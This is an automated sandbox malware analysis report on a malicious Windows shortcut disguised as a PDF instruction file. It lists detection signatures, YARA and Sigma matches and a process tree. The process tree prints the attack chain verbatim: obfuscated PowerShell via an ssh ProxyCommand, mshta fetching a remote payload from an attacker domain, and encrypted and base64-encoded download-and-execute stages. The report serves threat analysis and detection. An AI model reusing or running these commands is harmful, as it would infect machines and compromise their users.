Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk

Overview

General Information

Sample name:Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
Analysis ID:1576547
MD5:ae4dbbe945aeacfa5bb920e8d85cd0cb
SHA1:36a91b26586d8e758ac0dcf09f9d5ed40de75b3a
SHA256:f767f605802f74a578ced15d21e057249c9237dc0b4c09dbadc2d0e996411e91
Tags:lnkstaticklipxuhaq-shopuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 6480 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6568 cmdline: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 5416 cmdline: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68ADEC9363D782DED5421500BF4FBEE25A669215CB1C1CF9C4E39B42F859E459433536EBB2907989E1A5FC589691387EDB08362925BE79E141A8B621176532558D159FD2B1181F898AA05EEB1EA07A556D6526ACFF59D0D02B5A98F70D6AD20CB5BC07B4752386DCD6CC47CB918CA4AB8B27B8CD3B4ADEE286293420BA6F189987D8E71654846F001ADDA03742803420074C99A7E173A3AF1F07E40C7289919C5405C1BF8A5353A0076DB1E95557A94F9DD0AA6F83884FFA5DE3D8C61567935876B1F332ACB612F634FCAC6BA6072C8BE5661D6B0F2A165601A8CBF9F9DF3F753391F622DB6D5EAC28EEB76EBC8DD9D2F9B58AD024D91420FB02E416BF9CB1115FA4DE78D8634C0977354A5A3528B042F835A34E3B2AA719E59E38CC1C23AE866E10F0F6A1B75704280DB282B9F28720319946E2E42C1C71CB3CE37440E9AC836574DE323A1EE86F3FE448C5BCC423F5F8511F71FAFFCFC235341AF3D1E03B2D48457B15F12ABEBCB12BBF7D97FAE4E57BBD065FE92EAE2804E5A4CB23F8F63844CC023F22B67826B6F5D371262B7CB12B4DD1866657D6802B8BA8F65FEEF4565467CC239F917D93AAF7BE92EFCF3FCDB41866DA32FA7B3920D92A5187C3071762FD5B90058D2A5886857BBBFC1641257F8DF51B742E0D36775465ED3059DF960AA9CE6EA17442B78E7D79CCCF6C68F3A5106F7FA91081B616E536F3C9CE9FABA62C617DB84DEA248D21129E121AC109AC1F445C0489236B29800278CE4C44AAD96EC5A84896CE52146759758532CF0EDAAF5543CAE8091A5D93E45B0489408B3933747118015539E6D2A113E6E38BBCFDBB0C4F67C4F3B9085DEAE9478F58BA64392AB67EEF40B9CDAE975CBB60252F0683FBCD6DA3213FDF689E2EC1960A3842A6DBF718CC1FB567208847E41ECB7196F3CEBE8DA67E076CF9A78D99615A6AC5376D392816D30EC3EE11E891E380AF759932052BDAD62EBAAC8A637E4C0D8E78C05F7A5292076253BC4CC8764E55D595B0A901D5F0B12D1A41B183C5DA19A74BF50D22AE7E3C3F2DC7F99B740ACF26474319680DD6305577E584D9E445067EAFF8A5FE2FFD6722D48DBD50DA9391B1E40040D72ACFD3BAFB31E573428D9A562C36830221B3FF269656E0404B04B67712ECD9A11BE2B987725683494DFBCE427CFD4B1BC13B39A1DB3364671E654F56583E1155DCCE223ADCADC21B4CFB556679B5F6413FA8E33733AC785B00BFA5085E98931898DBC97044D2831337E76508662A8F067D7A4BA9E9800685A75793E895A3E25CEBF048DA05042A904C68D3DB385A07DB95058B0339750373030ABBB0AFA8F5701AFEDDFF97243B2AA2B201452F0D179D0098D775594E469D720050081AE8A2D326F8DC507DA60618DF27FCA45C101E8B651BEE7BB35CAC6FC05F6D8D0260EE5937D0627215D14CD6F415DBDA14A23923355B710E74518171C7AB2FBF67F6E89936F33643ED072D9048B1F470D499E2269D10C4BDA3D2E036ACCEA500CEFE7B6EB2CAACA113FC36D16F917ED9BB4D740F7E41D660E15D2463EA1581C42EC6919DC1E0A780A804BCF0E7FC2AE44182EB42885D55707E32B6D71AA993BE51EAC6D7513934C870B45F0321715A29B15AD8202C074C26148ADE61ED65D21DA94F7EF5CB616C7CA5608F6354EE8B744187BEC5261B209A162E278E3B4F9D1972618759D7555C844659AC6967C78FF1B9CD0AC814EA9EF977A4760D79CDCF97A7761C23DA11D1A5CB64CADE2438719A27A3698D8838794C22809194A8649C262D4E425E84F154F6A45FC8194C9ACFDE794A4CE529562EB7F69BE5DD7637F7D7042943FB3B1DCD77A2754C765AEA874B32A2FDE6445315340AE7A630E204AA9CD2F73EF8E2C8C9CAACF9D1BDA533898FE02AC3F1A6E48CCCDF779D4D53DEAA17B40D403E87A70307F16A4B0EDED94522FC0B4BA5F4D69FD381C16E3D7ABE7F4FD4401920E00BD04985980FCE3FF2F4A011D067AF739ACCFF58A224C866E599F3AC5B49676E01AAC90B973C65C9F01103773D2D8C133ADBE06005041C7C109F8C66189516CBA309737FEDC751C4F604DF4693F58F66913EEE3B038035C1D378A896E499A097E3D58E2F155EF1EE0506B7B8D1A8F18A1A1A716FB7285164D8C43BC1BAA8E98F871AC05C4E24E0A7F1A3993C7169988348083581A931B0C5592E1A3CF20DBCF3863E0E76899710846AF92240621AE31CDB4920925B19B1B07C1D46518248B4D468F4DA7F5D927B04C9BE7294204DDB4652AA452003777F5A3D80EBC42403A3AD15968985046D2E4F47B912D57D5EB899EA9FA0E6694AEFEAAC0F74DF287B54DC5CBD3E3DD891ADF810B6B87075F3CF10C2453528E504E6031E48ECD4E32186B8288C916309C2F3DCFC21E4B460631C73032BBA0AA67B4862C43E4D2454A966D0EEC1D04CD5AD4CC93054B2DE87E25838794ED1F0D11F8BE4EE03D51AD54BA97622534A0116CF79240F6A875E32BEEBF8A63DB83C15492DC24402AD6F208ABC2B5D989467A41D99C8E2300B856B4F5BEFED2EBB87E453FA20A04332FE49B5D249349EB1C6F4C58D68436B04991FDC6146D4E5A4237181E91CC5FBDCD42D75F303F5FC7645670A01FBC67B3B2FB783C4BCF4531734E41CB91B3922683EAC815AC5D6BDA0DDE1F5AA1D854D3CCDB657A7BD10ABD7849EA8463695D4BF1BC5BF54D9DD96BD5C4ED2BCBC536F84874F4DE4D51A607B7F9323F3810D8F1C577884F5E3AEB489DEB99828A96B20316FC0E52F0532D61640DD20E864C91F7F9509080F57DFCDAFB9B001F39FA155ADC3CB62052E2D0B79AB0C7BC932A00900DAD44BE231A095CA9FFCAD9CB574708825CCC56E8B08BB00D88466F8F6AE6585EB08EC24FBA6457E95ACD19CB3895B9E4AFB241F1A8AEDCABBD06F61042EFD60A6C48FC87301CBF951B7C1A1FD9BD8F5A8DBD97AB57CF3D376BA65C822D9D9DA725E615BB9CAC5C3B8325C73C4DB8F8F7C4F3FCE984B1B1EADF24A839E953B914717B4761F0F37DA59CF7B7D9AB1AF204D92364E0FBF747A8CB454B34AFD4D40846BE837344A7B6C733B2FA42B4B0F96FC8FF8ED0EAFFA5F3C2DA522885C45067384');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 984INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1687a:$b1: ::WriteAllBytes(
  • 0x178c0:$b1: ::WriteAllBytes(
  • 0x16832:$s1: -join
  • 0x1692c:$s1: -join
  • 0x17878:$s1: -join
  • 0x17972:$s1: -join
  • 0x54e49:$s1: -join
  • 0x555a9:$s1: -join
  • 0x62b85:$s1: -join
  • 0x72345:$s1: -join
  • 0x7f41a:$s1: -join
  • 0x827ec:$s1: -join
  • 0x82e9e:$s1: -join
  • 0x8498f:$s1: -join
  • 0x86b95:$s1: -join
  • 0x873bc:$s1: -join
  • 0x87c2c:$s1: -join
  • 0x88367:$s1: -join
  • 0x88399:$s1: -join
  • 0x883e1:$s1: -join
  • 0x88400:$s1: -join
Process Memory Space: powershell.exe PID: 6568JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 6568INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x8a025:$b1: ::WriteAllBytes(
    • 0xe2320:$b1: ::WriteAllBytes(
    • 0x13b7f8:$b1: ::WriteAllBytes(
    • 0x25c429:$b1: ::WriteAllBytes(
    • 0xa3dc:$b2: ::FromBase64String(
    • 0x878b6:$b2: ::FromBase64String(
    • 0xdd314:$b2: ::FromBase64String(
    • 0x13ae42:$b2: ::FromBase64String(
    • 0x246f46:$b2: ::FromBase64String(
    • 0x253fa5:$b2: ::FromBase64String(
    • 0x280aee:$b2: ::FromBase64String(
    • 0x283b0f:$b2: ::FromBase64String(
    • 0xa550:$b3: ::UTF8.GetString(
    • 0x87a2a:$b3: ::UTF8.GetString(
    • 0x882d5:$b3: ::UTF8.GetString(
    • 0xdd488:$b3: ::UTF8.GetString(
    • 0x13afb6:$b3: ::UTF8.GetString(
    • 0x2470ba:$b3: ::UTF8.GetString(
    • 0x254119:$b3: ::UTF8.GetString(
    • 0x280c62:$b3: ::UTF8.GetString(
    • 0x283c83:$b3: ::UTF8.GetString(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_6568.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      amsi64_6568.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4, ProcessId: 5416, ProcessName: mshta.exe
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68A
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFE